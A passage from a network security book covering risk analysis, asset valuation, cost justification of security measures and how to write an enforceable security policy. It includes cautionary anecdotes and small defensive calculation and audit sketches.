For questions 6–11, if your score was between 7 and 10, it may be most cost effective to utilize only a minimal amount of security around the perimeter of your network. If your score was between 11 and 16, you should be utilizing some solid firewall technology. If you scored above 16, consider using multiple firewall solutions.

If question 12 applies to your organization, you should investigate extending your defenses beyond the physical limits of your network. Once data leaves the confines of your network, it is that much more difficult to ensure that it is not compromised.

In later chapters, we'll examine in detail the technology required by each of the above situations. This checklist is designed to give you an early feel for how security conscious you should be when securing your networking environment. Keep in mind that this list is simply a guide; each network has its own individual nuances. Your mileage may vary. A tallying sketch follows the Note below.

Note: Along with the results of this worksheet, you should also take a close look at the level of computer expertise within your organization. A "power user" environment is less likely to cause damage inadvertently—but is more likely to have the knowledge required to launch an attack. Conversely, an uneducated user environment is less likely to launch an attack but more likely to cause accidental damage.
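If you prefer to tally the worksheet programmatically, the following sketch applies the thresholds above. The overlapping question ranges (question 6 counts toward both groups) are taken verbatim from the worksheet; treating question 12 as "applicable" at a rating of 3 or higher is our assumption, not a rule from the text.

    def assess_attack_potential(ratings):
        """ratings: dict mapping question number (1-12) to a score of 1-5."""
        internal = sum(ratings[q] for q in range(1, 7))     # questions 1-6
        perimeter = sum(ratings[q] for q in range(6, 12))   # questions 6-11
        advice = []
        if internal > 12:
            advice.append("Lock down the internal environment as "
                          "aggressively as the network perimeter.")
        elif internal >= 8:
            advice.append("Take steps to secure the internal network.")
        if perimeter > 16:
            advice.append("Consider multiple firewall solutions.")
        elif perimeter >= 11:
            advice.append("Deploy solid firewall technology.")
        elif perimeter >= 7:
            advice.append("Minimal perimeter security may be cost effective.")
        if ratings.get(12, 1) >= 3:      # assumption: question 12 "applies"
            advice.append("Extend defenses beyond the physical network.")
        return advice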
Summary

In this chapter, we saw that the number of security incidents is increasing and that most of these go undocumented. We looked at the differences between a hacker and an attacker and covered the benefits of discussing security vulnerabilities in a public forum. We also explored who might try to attack your network and why, as well as how to assess your likelihood of being the target of an attack.

Now that you understand who may wish to attack you and why, you can evaluate the different levels of risk to your organization. By performing a risk analysis, you will see more clearly how much protection your organization truly needs.

Chapter 2: How Much Security Do You Need?

Before you decide how to best safeguard your network, you should identify the level of protection you wish to achieve. Begin by analyzing your network to determine what level of fortification you actually require. You can then use this information to develop your security policy. Once you are armed with this information, you are in a good position to start making intelligent decisions about your security structure.

Performing a Risk Analysis

A risk analysis is the process of identifying the assets you wish to protect and the potential threats against them. Performing an accurate risk analysis is a vital step in securing your network environment.

A formal risk analysis answers the following questions:

• What assets do I need to protect?
• From what sources am I trying to protect these assets?
• Who may wish to compromise my network, and to what gain?
• How likely is it that a threat will violate my assets?
• What is the immediate cost if an asset is compromised?
• What is the cost of recovering from an attack or failure?
• How can these assets be protected in a cost-effective manner?
• Am I governed by a regulatory body that dictates the required level of security for my environment?

What Assets Do I Need to Protect?

Any effective risk analysis must begin by identifying the assets and resources you wish to protect. Assets typically fall into one of four categories:

• Physical resources
• Intellectual resources
• Time resources
• Perception resources

Physical Resources

Physical resources are assets that have a physical form. These include workstations, servers, terminals, network hubs, and even peripherals. Basically, any computing resource that has a physical form can be considered a physical resource.

When performing a risk analysis, don't forget physical resources. I once worked at an organization whose security policies were loose—to say the least. One day, an individual walked in the front door and identified himself as the printer repairman. The receptionist, a trusting soul, waved him through, giving him directions on how to find the office of the company's network administrator. A few minutes later, the "repairman" returned to the front desk, claiming that the printer needed repair and that he was taking it back to the shop.

The printer, of course, did not need repair. The "repairman" never sought out the network administrator; he disconnected the first high-end printer he came across and walked right out the door with it. The network administrator discovered the theft later when employees complained that they could not print (difficult to do when you do not actually have a printer!).

The final objective of a risk analysis is to formulate a cost-effective plan for guarding your assets. In the course of your analysis, do not overlook the most obvious problem areas and solutions. For example, the printer theft just described could have been completely avoided if the organization had required all non-employees to have an escort. Implementing this precaution would have had a zero cost impact—and would have saved the company the cost of replacing a top-end network printer.

Intellectual Resources

Intellectual resources can be harder to identify than physical resources, because they typically exist in electronic format only. An intellectual resource is any form of information that plays a part in your organization's business. This can include software, financial information, and database records, as well as schematic or part drawings.

Take your time when listing intellectual resources. It can be easy to overlook the most obvious targets. For example, if your company exchanges information via e-mail, the storage files for these e-mail messages should be considered intellectual assets.

Time Resources

Time is an important organizational resource, yet one sometimes overlooked in a risk analysis. Time, however, can be one of an organization's most valued assets.
When evaluating what lost time could cost your organization, make sure that you include all the consequences of lost time.

Time Is Money

How much is lost time worth? As an example, let's say that you identify one of your Engineering servers as an organizational resource. You identify the physical resource (the server itself) and the intellectual resources (the data stored on the server's hard drive). How do you factor time resources into your risk analysis?

Let's assume that although the server is backed up nightly, the server has no built-in fault tolerance. There is just a single disk holding all of the Engineering data. What if the server experiences a hard drive crash? What is lost in physical, intellectual, and time resources due to this crash?

The physical loss would be the drive itself. Given the cost of hard drive space these days, the dollar value of the drive would be minimal.

As for intellectual loss, any data saved to the server since the last backup would be gone. Since you have nightly backups, the loss should be no greater than one day's worth of information. This, of course, brings us back to time, because it will take time for the engineers to rebuild the lost information.

In determining the actual time loss, consider the cleanup job for the server administrator, who must

• Locate and procure a suitable replacement drive for the server.
• Install the new drive in the system.
• Completely reinstall the network operating system, any required patches, and the backup software, if necessary.
• Restore all required backup tapes. If a full backup is not performed every night, there may be multiple tapes to restore.
• Address disk space issues, if multiple tapes are required for restoration. (Backup software typically does not record file deletions. Therefore, you may end up restoring files that were previously deleted to create additional disk space.)

Also, since the server administrator is focusing on recovering the server, her other duties must wait.

Keep in mind that while the server administrator is doing all this work, the Engineering staff may be sitting idle or playing Quake, waiting for the server to come back online. It is not just the server administrator who is losing time, but the entire Engineering staff, as well.

To quantify this loss, let's add some dollars to the equation. Let's assume that your server administrator is proficient enough to recover from this loss in one work day. Let's also assume that she earns a modest salary of $50,000 per year, while the average salary for the 30 programmers who use this system is $60,000 per year.

• Administrator's time recovering the server = $192
• Engineering time to recover one day's worth of data = $6,923
• Engineering time lost due to offline server = $6,923
• Total cost impact of one-day outage = $14,038

Clearly, the cost of a one-day server outage can easily justify the cost of redundant disks, a RAID array, or even a standby server. Our calculations do not even include the possibility of lost revenue or damaged reputation if your Engineering staff now fails to meet a scheduled shipment date.

As you attempt to quantify time as a resource within your organization, make sure you identify its full impact. Very rarely does the loss or compromise of a resource affect the productivity of only a single individual.
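The dollar figures in the Time Is Money sidebar are easy to reproduce. The short sketch below shows the arithmetic, assuming 260 working days per year and an eight-hour work day (our assumptions; the sidebar does not state them). The final line anticipates the per-minute downtime figure used later in this chapter.

    WORK_DAYS_PER_YEAR = 260   # assumption: 52 weeks x 5 days
    MINUTES_PER_DAY = 8 * 60   # assumption: one 8-hour shift

    admin_salary = 50_000      # server administrator
    engineer_salary = 60_000   # average of the 30 programmers
    engineers = 30

    admin_day = admin_salary / WORK_DAYS_PER_YEAR                 # ~$192
    staff_day = engineers * engineer_salary / WORK_DAYS_PER_YEAR  # ~$6,923

    # One day recovering the server, one idle day for Engineering, and
    # one day of Engineering effort to re-create the lost data:
    total = admin_day + staff_day + staff_day                     # ~$14,038

    print(f"Administrator's recovery time: ${admin_day:,.0f}")
    print(f"Engineering staff, idle:       ${staff_day:,.0f}")
    print(f"Engineering staff, lost data:  ${staff_day:,.0f}")
    print(f"Total one-day outage:          ${total:,.0f}")
    print(f"Idle Engineering cost/minute:  ${staff_day / MINUTES_PER_DAY:,.2f}")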
Perception Resources
After the denial-of-service attacks in February of 2000, most of the companies involved (Yahoo, Amazon, eBay, and Buy.com, among others) saw their stock prices fall. Although this loss was not long term, it still had a real, measurable impact on the trust of consumers and stockholders. With the publicity surrounding the penetration of Microsoft’s systems in October of 2000, some wondered if valuable source code had been unknowingly altered. Although Microsoft denied damage, the fact of the penetration alone was enough to damage the credibility and trust of not only the company but also its products.

Note For a publicly traded company, reputation can translate into a tangible asset. Even for privately held companies or governmental departments, every organization survives on its reputation. In many cases, organizations might be tempted to put more emphasis on maintaining a perception of trust and capability than on maintaining true data integrity.

The risk of damage to perception has been the cause of significant trouble for those working in the security industry (including law enforcement entities) who rely on the information and experience of their peers to design better protection systems or to pursue legal actions. In an attempt to encourage the free exchange of valuable technical details of hacking attacks, while preserving the perception of the contributing company, the Federal Bureau of Investigation (FBI) has established the Infrastructure Protection and Computer Intrusion Squad (IPCIS), which functions as an anonymous clearinghouse of hacker techniques and procedures.

Note A denial-of-service (DoS) attack attempts to prevent a system from carrying on network communications. A DoS attack may try to make a single service on a target system inoperable, or the goal of the attack may be to deny all network connectivity.

From What Sources Am I Trying to Protect These Assets?
Potential network attacks can come from any source that has access into your network. These sources can vary greatly, depending on your organization’s size and the type of network access provided. While performing a risk analysis, insure that you identify all potential sources of attack. Some of these sources could include
• Internal systems
• Access from field office locations
• Access through a WAN link to a business partner
• Access through the Internet
• Access through modem pools

Keep in mind that you are not yet evaluating who may attack your network. You are strictly looking at what media are available to gain access to network resources.

Who May Wish to Compromise Our Network?
In the last chapter, we discussed who in theory might be motivated to compromise your network. You should now put pen to paper and identify these potential threats. To review, potential threats could be
• Employees
• Temporary or consulting personnel
• Competitors
• Individuals with viewpoints or objectives radically different from those of your organization
• Individuals with a vendetta against your organization or one of its employees
• Individuals who wish to gain notoriety due to your organization’s public visibility

Depending on your organization, there may be other potential threats you wish to add to this list.
The important things to determine are what each threat stands to gain from a successful attack and what that gain may be worth to the attacker.

What Is the Likelihood of an Attack?
Now that you have identified your resources and who might attack them, you can assess your organization’s level of risk. Do you have an isolated network, or does your network have many points of entry, such as a WAN, a modem pool, or an inbound VPN via the Internet? Do all of these connection points use strong authentication and some form of firewalling device, or were rattles and incense used to set up a protective aura around your network? Could an attacker find value in exploiting one of these access points in order to gain access to your network resources? Clearly, a typical would-be attacker would prefer to attack a bank rather than a small architectural firm.

Appraising the attack value of your network is highly subjective. Two different people within the same organization could have completely different opinions about the likelihood of an attack. For this reason, consider soliciting input from a few different departments within your organization. You may even want to bring in a trained consultant who has hands-on experience in performing risk assessments. It is important that you define and understand the likelihood of attack as clearly as possible—it will guide you when you cost justify the security precautions required to safeguard your network.

What Is the Immediate Cost?
For each asset listed, record the immediate cost impact of having that resource compromised or destroyed. Do not include long-term effects (such as failure to meet shipment deadlines); simply calculate the cost of having this asset inaccessible as a network resource.

For example, given the hard-drive failure we looked at earlier, the immediate cost impact of the failure would be defined as the lost productivity of the Engineering staff for each minute that the server remains offline: one day’s Engineering payroll of $6,923, spread over a 480-minute work day, is roughly $14.50 per minute.

Sometimes immediate cost can be more difficult to quantify. For example, what if the compromise leads to a competitor gaining access to all schematics, drawings, and parts lists for a new product line? This could allow your competitor to develop a better product and beat your release to market. The loss in such a case could be disastrous. Even more difficult to quantify, but no less real, is the loss of trust, or the perception of weakness. Compromised investor and consumer confidence, usually reflected in a lower stock price, and lowered employee morale are all immediate reactions that can affect the bottom line.

Sometimes, however, monetary cost is not the main factor in determining losses. For example, while a hospital may suffer little financial loss if an attacker accesses its medical records, the destruction of these records could cause a catastrophic loss of life. When determining the immediate cost of a loss, look beyond the raw dollar value.

What Are the Long-Term Recovery Costs?
Now that you have quantified the cost of the initial failure, you should evaluate the costs incurred when recovering from a failure or compromise. Do this by identifying the financial impact of various levels of loss.
For example, given a server that holds corporate information,
• What is the cost of a momentary glitch that disconnects all users?
• What is the cost of a denial-of-service attack, which makes the resource unreachable for a specific period of time?
• What is the cost of recovering critical files that have been damaged or deleted?
• What is the cost of recovering from the failure of a single hardware component?
• What is the cost of recovering from a complete server failure?
• What is the cost of recovery when information has been stolen and the theft goes undetected?

The cost of various levels of failure, combined with the expectation of how frequently a failure or attempted attack may occur, provides metrics to determine the financial impact of disaster recovery for your organization’s network. Based on these figures, you now have a guide to determine what should reasonably be spent in order to secure your assets. Remember that some assets (like reputation or consumer and investor confidence) can be difficult to quantify, but are real nonetheless.
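These two ingredients, cost per incident and expected frequency, are what security texts commonly combine into an annualized loss expectancy (ALE). A minimal sketch of the calculation follows; apart from the $14,038 drive-failure figure from earlier in this chapter, the scenario costs and frequencies are invented for illustration.

    # Annualized loss expectancy (ALE): cost per incident weighted by the
    # number of incidents expected per year. Except for the drive-failure
    # figure from earlier in the chapter, all values are invented.
    scenarios = {
        # name: (cost per incident, expected incidents per year)
        "momentary glitch":        (500,     12),
        "denial of service":       (14_000,   0.5),
        "single drive failure":    (14_038,   1),
        "complete server failure": (45_000,   0.1),
    }

    total = 0
    for name, (cost, rate) in scenarios.items():
        ale = cost * rate
        total += ale
        print(f"{name:24s} ALE = ${ale:>9,.0f}")
    print(f"{'total':24s}       ${total:>9,.0f}")

Each scenario’s annualized figure then feeds directly into the cost-justification question addressed next: a countermeasure is reasonable when it costs less than the annualized loss it prevents.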
How Can I Protect My Assets Cost-Effectively?
You must consider how much security will cost when determining what level of protection is appropriate for your networking environment. For example, it would probably be overkill for a five-user architectural firm with no remote access to hire a full-time security expert. Likewise, it would be unthinkable for a bank to allow outside network access without regard to any form of security measures or policies.

Most of us, however, fall somewhere in between these two networking examples—so we face some difficult security choices. Is packet filtering sufficient for protecting my Internet connection, or should I invest in a firewall? Is one firewall sufficient, or is it worthwhile to invest in two? These are some of the decisions that plague security experts on a daily basis.

Tip The general guideline is that the cost of all security measures taken to protect a particular asset should be less than the cost of recovering that asset from a disaster. This is why it is important to quantify potential threats as well as the cost of recovery. While security precautions are necessary in the modern networking environment, many of us are still required to justify the cost of these precautions.

Cost justification may not be as difficult as it sounds. For example, we noted that a one-day server outage in our Engineering environment could cost a company well over $14,000. Clearly, this is sufficient cost justification to invest in a high-end server complete with RAID array.

There can be hidden costs involved in securing an environment, and these costs must also be taken into account. For example, logging all network activity to guard against compromise is useless unless someone dedicates the time required to review all the logs generated. Clearly, this could be a full-time job all by itself, depending on the size of the environment. By increasing the level of detail being recorded about your network, you may create a need for a new security person.

Also, with increased security there is typically a reduction in ease of use or access to network resources, which can make it more cumbersome and time-consuming for end users to perform their job functions. This does not mean that you must avoid this reduction in ease of use; it can be a necessary evil when securing an environment and must be identified as a potential cost in lost productivity.

To summarize, before you solicit funds for security precautions, you should outline the ramifications of not putting those precautions into place. You should also accurately identify what the true cost of these precautions may be.

Am I Governed by a Regulatory Body?
Even though you have created a painstakingly accurate risk analysis of your network, there may be some form of regulatory or oversight body that dictates your minimum level of security requirements. In these situations, it may not be sufficient to simply cost justify your security precautions. You may be required to meet certain minimum security requirements, regardless of the cost outlay to your organization.

For example, in order to be considered for military contract work, your organization must strictly adhere to many specific security requirements. Typically, the defined security precautions are not the only acceptable security measures, but they are the accepted minimum. You are always welcome to improve on these precautions if your organization sees fit.

Note When working with the government, many contractors are required to use a computer system that has received a specific Trusted Product rating from the National Security Agency. For a list of which products have received each rating, check out http://www.radium.ncsc.mil/tpep/epl/epl-by-class.html.

Other examples of government regulation that dictate security requirements include the Children’s Online Privacy Protection Act (COPPA—see www.ftc.gov/bcp/conline/pubs/buspubs/coppa.htm) and the Health Insurance Portability and Accountability Act (HIPAA—see www.nationalpartnership.org/healthcare/hipaa/guide.htm). Although the U.S. has yet to pass any privacy laws concerning e-commerce, other countries (most notably in Europe) strictly control what data can be collected and stored by companies.

If your organization’s security is subject to some form of regulatory agency, you will be required to modify the cost-justification portion of your risk analysis in order to bring your recommendations in line with dictated policy.

Budgeting Your Security Precautions
You should now have a pretty good idea about what level of security you will be able to cost justify. This should include depreciable items (server hardware, firewalls, and construction of secured areas), as well as recurring costs (security personnel, audits, and system maintenance).

Remember the old saying, “Do not place all of your eggs in one basket”? This wisdom definitely applies to budgeting security. Do not spend all of your budget on one mode of protection. For example, it does little good to invest $15,000 in firewall technology if someone can simply walk through the front door and walk away with your corporate server.

Tip It may be possible, however, to combine budget expenditures with other groups within your organization. For example, while it may be difficult to cost justify a secure, controlled environment for your networking hardware and servers, you might justify this cost if the room will also house all PBX, voicemail, and telephone equipment.

Another example could be the Engineering server we discussed earlier in this chapter.
Engineers always require additional server storage space (it’s in the job description). During the next upgrade of server storage, it may be possible to justify a redundant disk system and charge part of the cost to the Engineering department.

A new addition to the security budget at some companies is security insurance. Although this might seem unusual at first glance, most IT professionals can readily see the dollar value of their data and how the corruption or loss of that data justifies taking such a precaution.

The bottom line is to be creative. The further you can stretch your security budget, the more precautions you can take. Security is a proactive expenditure: you invest in precautions and procedures in the hope of realizing a return by not having to spend additional money later cleaning up after a network disaster. The more precautions that can be taken, the less likely disaster is to strike.

Documenting Your Findings
You’ve now identified all your assets, analyzed their worth to your day-to-day operations, and estimated the cost of recovery for each. Now take some time to formalize and document your findings. There are a number of reasons why this is worth your time.

First, having some sort of document—whether electronic or hard copy—gives you some backup when you begin the tedious process of justifying each of your countermeasures. It is far more difficult to argue with documented numbers and figures than it is to argue with an oral statement. By getting all your ducks in a row up front, you will be less likely to have to perform damage control later.

This document should be considered fluid; expect to have to adjust it over time. No one is ever 100 percent accurate when estimating the cost of intrusions or failures. If you are unfortunate enough to have your inaccuracy demonstrated, consider it an opportunity to update and improve your documentation.

Network environments change over time, as well. What happens when your boss walks into your office and announces, “We need to set up a new field office. What equipment do we need and how much will it cost us?” By having formal documentation that identifies your current costs, you can easily extrapolate these numbers to include the new equipment.

This information is also extremely useful as you begin the process of formalizing a security policy. Many people have an extremely deficient understanding of the impact of network security. Unfortunately, this can include certain managerial types who hold the purse strings on your budget (just look for the pointy hair—it’s a dead giveaway).

As you begin to generate your security policy, it is much easier to justify each policy item when you can place a dollar value on the cost of an intrusion or attack. For example, your manager may not see the need for encrypting all inbound data until she realizes that the loss of this information could rival the cost of her salary. The last thing she wants to hear is that someone above her may realize that the company can recoup this loss by simply removing the one person who made a very bad business decision.

Developing a Security Policy
The first question most administrators ask is, “Why do I even need a formal security policy?” A security policy serves many functions. It is a central document that describes in detail acceptable network activity and penalties for misuse.
A security policy also provides a forum for identifying and clarifying security goals and objectives to the organization as a whole. A good security policy shows each employee how she is responsible for helping to maintain a secure environment.

Note For an example of a security policy, see Appendix B.

Security Policy Basics
Security policies tend to be issue driven. A focus on individual issues is the easiest way to identify—and clarify—each point you wish to cover. While it may be acceptable in some environments to simply state, “Non–work-related use of the Internet is bad,” those who must adhere to this policy need to know what “non–work-related use” and “bad” actually mean.

In order for a policy to be enforceable, it needs to be
• Consistent with other corporate policies
• Accepted by the network support staff as well as the appropriate levels of management
• Enforceable using existing network equipment and procedures
• Compliant with local, state, and federal laws

Consistency Is Key
Consistency insures that users will not consider the policies unreasonable or irrational. The overall theme of your security policy should reflect your organization’s views on security and acceptable corporate practices in general. If your organization has a very relaxed stance towards physical security or use of company assets, it may be difficult or pointless to enforce a strict network usage policy. For example, I once consulted for a firm whose owner insisted that all remote connections to the network be encrypted using the largest cipher key possible. Remote users were required to maintain different logon names and passwords for remote access, and these accounts had to be provided with only a minimal amount of access. Also, remote access was left disabled unless someone could justify a specific need for accessing the network remotely.

While this may not seem all that far-fetched, the facility where this network was housed was protected by only a single cipher lock with a three-digit code. The facility had no alarm system and was in a prime physical location to be looted undetected. The combination for the cipher lock had not been changed in over seven years. Also, employees frequently gave out the combination to anyone they felt needed it (this included friends and even the local UPS guy!).

As if all this were not bad enough, there was no password requirement for any of the internal accounts. Many users (including the owner) had no passwords assigned to their accounts. This included two servers that were left in an easily accessible location.

The firm was probably right to be concerned with remote-access security. The measures taken bordered on absurd, however, when compared to the organization’s other security policies. Clearly, there were other issues that should have had a higher priority than remote network access. The owner may very well have found this remote-access policy difficult to enforce, because it was inconsistent with the organization’s other security practices. If the employees see little regard being shown for physical access to the facility, why should Internet access be any different?

Acceptance within the Organization
For a policy to be enforceable, it must be accepted by the appropriate authorities within the organization.
It can be frustrating at best to attempt to enforce a security policy if management does not identify and acknowledge the benefits your policy provides.

A good example of what can happen without management acceptance is the legal case of Randal Schwartz (a major contributor to the Perl programming language) versus Intel. While he was working as a private contractor for Intel, Schwartz was accused of accessing information which, according to Intel’s security policy, he should not have been viewing. Although Intel won its controversial case against Schwartz, that case was severely weakened when it came to light that Intel’s full-time employees were not bound by the same security policy being used to convict Schwartz.

While testifying in the trial, Ed Masi, Intel’s corporate vice president and general manager, freely admitted to not following Intel’s security policy. What made the case even murkier was that Intel never filed charges against Masi for failing to adhere to the policy. This left the impression that Intel’s security policy was fluid at best and that Schwartz was being singled out.

Note You can read all about Randal Schwartz versus Intel at www.lightlink.com/spacenka/fors/.

An organization’s security policy must be accepted and followed at all levels of management. In order to be successful, it must be understood that these policies are equally applicable to all network users.

Enforceability
In order for a security policy to have merit, it must be enforceable. Stating that “each network user is required to change his or her password every 90 days” will have little effect if your network operating system does not expire and lock accounts that exceed this 90-day limit.

While you can legally create policies that cannot be enforced, doing so as a matter of practice is not a wise choice. You do not want to leave your users with the impression that ignoring corporate policy is OK because adherence is not verified. If there is no verification, then there are no ramifications for noncompliance. If there were no state troopers, how many of us would drive at the speed limit on the highway?

Tip Noncompliance with one network usage policy can quickly lead to a domino effect of employees ignoring all network usage policies. Choose your battles wisely. This is particularly true if you are establishing a network usage policy for the first time. You do not have to verify usage compliance 100 percent of the time—but make sure that you have some method of reporting or monitoring usage if enforcement of your policy becomes an issue.
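As a concrete example of verifiable enforcement, consider the 90-day password rule mentioned above. On a UNIX system that records password aging in the shadow file, a short audit script can report violations. Below is a minimal sketch in Python; it assumes shadow-style aging fields are populated, and it must run as root in order to read them.

    # Flag accounts whose passwords are older than a 90-day policy limit.
    # Minimal audit sketch: requires root (to read the shadow database) and
    # a system that records password aging in shadow-style fields.
    import spwd
    import time

    POLICY_MAX_DAYS = 90
    today = int(time.time() // 86400)    # days since the UNIX epoch

    for entry in spwd.getspall():
        last_change = entry.sp_lstchg    # day the password was last set
        if last_change <= 0:
            continue                     # no aging information recorded
        age = today - last_change
        if age > POLICY_MAX_DAYS:
            print(f"{entry.sp_namp}: password is {age} days old")

The specific mechanism matters less than the principle: publish the rule only if something, whether an expiration setting in the network operating system or a periodic audit like this one, actually verifies it.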
Sometimes it is not even sufficient to actively monitor all aspects of a specific policy issue. Take care to disseminate such issues in an appropriate manner. For example, a security policy is typically considered to be company private. However, there may be policy issues that affect individuals outside of the organization. These policy issues must be made public in order to insure that they are enforceable.

There is a story floating around the Internet (it may be truth or it may be lore) that describes how an organization monitored, tracked, and then identified a remote attacker who had broken into one of its systems. As the story goes, the police arrested the suspect, and the accused was brought to trial.

During the trial, the accused freely admitted to accessing the network resource in question. His stated defense was that he had no idea that he was doing anything wrong, since upon accessing the resource he was presented with a “welcome” screen.

The defense argued that it was beyond the accused’s ability to determine that he should not have been accessing this specific resource. As a precedent, defense lawyers cited a local property law requiring landowners to post notices to keep trespassers off their land. The judge, who found it easier to relate to local property laws than to high-tech computer crimes, accepted the defense’s argument and released the suspect.

As part of enforcing your network security policy, make sure you disseminate it properly. Do not overlook some of the more obvious places to state this policy, such as logon scripts and terminal messages.

Compliance with Local, State, and Federal Laws
You might want to have your organization’s legal counsel review any policies before you implement them. If any portion of a specific policy issue is found to be unlawful, the entire issue—or even the policy itself—may be disregarded.

For example, a policy stating that “noncompliance will result in a severe flogging” will be thrown out by a court of law if flogging has been outlawed in your locale. You may truly wish to flog the attacker for compromising your network, but by specifying an illegal reprisal, you may surrender all chances of recourse. Appropriate wording is crucial. Insure that all policies are written in a precise, accurate, and legal manner.

A legal review will also help to identify the impact of each policy item. Without precise wording, a well-intentioned policy may have an extremely negative effect.

In a recent court case, an employee won a $175,000 settlement because she accidentally viewed what she considered to be a pornographic Web site while on the job. How did she get away with holding her employer accountable? Was the questionable site located on a company-owned Web server?

The answer should scare you. The company had a corporate policy stating that “pornographic sites will be blocked, and they cannot be accessed from the corporate network.” The company was filtering out access to sites that contained what it considered to be questionable subject matter. Unfortunately, there are so many “questionable” sites on the Internet that there is no way to block them all.

The court ruled that the company was liable for breach of contract because it did not hold up its end of the bargain by blocking all so-called questionable sites. By instituting a policy stating that it would filter out these sites, the company was “accepting responsibility for the successful execution of this activity”—and was therefore accountable. The damage award, as well as reimbursement for the employee’s “distress,” was based on this finding.

How should this policy item have been written? Consider the following statement:

Accessing Internet-based Web sites with company-owned assets, for purposes other than executing responsibilities within an employee’s job function, is considered grounds for dismissal. We reserve the right to monitor and filter all employee network activity in order to insure compliance.

This statement still enforces the spirit of the original policy.
It removes the word “questionable,” which is wide open to interpretation, and specifically forbids all Web site access that is not related to an employee’s job function. Also, it puts the burden of compliance on the employee, not the employer, while still allowing the organization to attempt to filter out these sites.

Tip Proper wording can make all the difference in the world between a good and a bad security policy.

What Makes a Good Security Usage Policy?
At a minimum, a good security usage policy should
• Be readily accessible to all members of the organization.
• Define a clear set of security goals.
• Accurately define each issue discussed in the policy.
• Clearly show the organization’s position on each issue.
• Describe the justification of the policy regarding each issue.
• Define under what circumstances the issue is applicable.
• State the roles and responsibilities of organizational members with regard to the described issue.
• Spell out the consequences of noncompliance with the described policy.
• Provide contact information for further details or clarification regarding the described issue.
• Define the user’s expected level of privacy.
• Include the organization’s stance on issues not specifically defined.

Accessibility
Making your security policy public within the organization is paramount to its effectiveness. As mentioned earlier, logon scripts and terminal messages are a good start.

If your organization has an employee handbook, see about incorporating your security policy into this document. If your organization maintains an intranet Web site for organizational information, have your document added to this site, as well.

Defining Security Goals
While it may seem like simple common sense, a statement of purpose, which defines why security is important to your organization, can be extremely beneficial. This statement can go a long way toward insuring that policy issues are not deemed frivolous or unnecessary.

As part of this statement, feel free to specify your organization’s goals for its security precautions. People are far more accepting of additional standards and guidelines when they understand the benefits these can provide.

Tip A sample security policy has been included in Appendix B. Use this as a guide when creating a security policy for your organization.

Defining Each Issue
Be as clear and precise as possible when describing each policy issue. Insure that all language and terminology are as accurate as possible.

For example, do not refer to Internet access in general; instead, identify the specific services the issue addresses (e-mail, file transfers, and so on). If it becomes necessary later to enforce the policy issue, your organization will have a precise description to fall back on. All too often, general descriptions are open to interpretation—and misinterpretation.

Tip An accurate description becomes even more important if your company uses VPN technology over the Internet. Be precise in defining the difference between public hosts on the Internet and hosts located on the other end of a VPN connection.

Your Organization’s Position
Use clear, concise language to state your organization’s views on the described policy issue. For example, adjectives such as “unacceptable” contain many shades of gray.
A worker’s performance might be “unacceptable”—but not necessarily in violation of any specific policy.

When describing matters of policy, stick to words that convey clear and precise meanings. Negative examples include “violation,” “breach of contract,” “offense,” and “abuse.” Positive examples include “permissible,” “legitimate,” “sanctioned,” and “authorized.” By avoiding ambiguous terms, you can be certain that the policy meanings—as well as the ramifications of noncompliance—are clear and enforceable.

Justifying the Policy
We have already discussed a general statement of purpose, which defines an overall set of security goals; you should also justify each policy issue. This shows your network users why each point in the policy is important. For example, the statement, “Since e-mail is considered to be an unsecured medium, it is not permissible to use it for conveying company private information,” simultaneously states the policy issue and justifies the policy.

When Does the Issue Apply?
Be sure to make clear under what circumstances the policy is considered to be in effect. Does the policy affect all users equally, or only certain work groups? Does it remain in effect after business hours? Does it affect the main office only, or field offices as well?

When you set forth clearly how the policy will be applied, you also clarify its expected impact. This insures that there is no uncertainty about whom this policy applies to. You want to eliminate the possibility that any employee will assume that the policy must apply to everyone but himself or herself.

Roles and Responsibilities
Any chain is only as strong as its weakest link, so be sure to make it clear that all members of the organization are responsible for asset security. Security is everyone’s concern, not just a part of a particular person’s job description.

Be sure to identify who is responsible for enforcing security policies and what type of authorization this person has from the organization. If a user is asked to surrender access to the system, it is crucial that a clear policy be in place identifying who has the authority to make such a request.

Consequences of Noncompliance
What if an employee fails to follow or simply ignores a specific security policy issue? Your organization must have a reaction or remedy in place if this occurs. Be sure your policy includes a description of possible reprisals for noncompliance.

It is important that this statement be both legal and clearly defined. Stating that “appropriate action will be taken” does not describe the severity of possible repercussions. Many times a reprisal is left vague because the people writing a policy cannot agree on a proper response. It is extremely important that a proper remedy be assigned, however, because the severity of the penalty can help convey just how seriously your organization views the issue.

For example, sending harassing e-mail may be considered grounds for dismissal, while cruising the Web in order to find the best price for a home computer may only warrant a verbal warning. When you identify consequences of noncompliance, be specific about what actions your organization may take.

For More Information
It is difficult to formulate a policy that clearly defines all potential aspects of a specific issue.
For this reason, you should identify a resource responsible for providing additional information.

Since individuals’ responsibilities can change, identify this resource by job function rather than by name. It’s better to write, “Consult your direct supervisor for more information” or “Direct all queries regarding this issue to the network security administrator” than “Forward all questions to Billy Bob Smith.”

Level of Privacy
Privacy is always a hot topic: your organization should clearly state its views on privacy with regard to information stored on organizational resources. If an organization does not expressly claim ownership of stored information, this information may be construed as the property of the employee.

Don’t assume that company private information is private—spell it out. There was a well-publicized case a number of years ago in which a high-level executive left his job for a position with a major competitor. Suspecting that this person may have walked off with some private information, the company retrieved and reviewed all of his e-mail messages. They found evidence that this ex-employee had in fact left with some information that the company considered vital to maintaining its competitive edge.

When the case went to trial, however, the e-mail was considered inadmissible because there was no clear policy identifying e-mail as a company-owned resource. The defense argued that e-mail is identical to postal mail and as such enjoys the same level of privacy.

The judge in the case was well aware that the U.S. Post Office is not allowed to open personal letters without a court order. The defense argued that, in this situation, the company should be held to the same standard as the Post Office, since its resources were responsible for delivering the mail. As a result, the e-mail was declared inadmissible and the company lost its case due to lack of evidence.

The moral of this story is that it is extremely important to assert ownership of network resources, and to spell out the measures that can be taken to enforce described policy issues.

Issues Not Specifically Defined
When implementing a firewall, two stances are possible with regard to network traffic. The first is “that which is not expressly permitted is denied”; the second is “that which is not expressly denied is permitted.” The first takes a firm stance with regard to security, while the latter is a more liberal approach.

These same principles apply to your security policy. You can design your policy to be restrictive (“That which is not expressly permitted is denied”) or open (“That which is not expressly denied is permitted”) with regard to matters that are not clearly defined. This provides a fallback position if an issue arises that is not specifically described by your security policy. This is a good idea, as you will inevitably forget to mention something.

Include a statement outlining the organization’s stance on issues not explicitly addressed within the security policy itself. Which approach is more appropriate will depend on how strict a security policy you are trying to create. Typically, however, it is easier to begin with a tighter stance on security and then open up additional policies as the need arises.
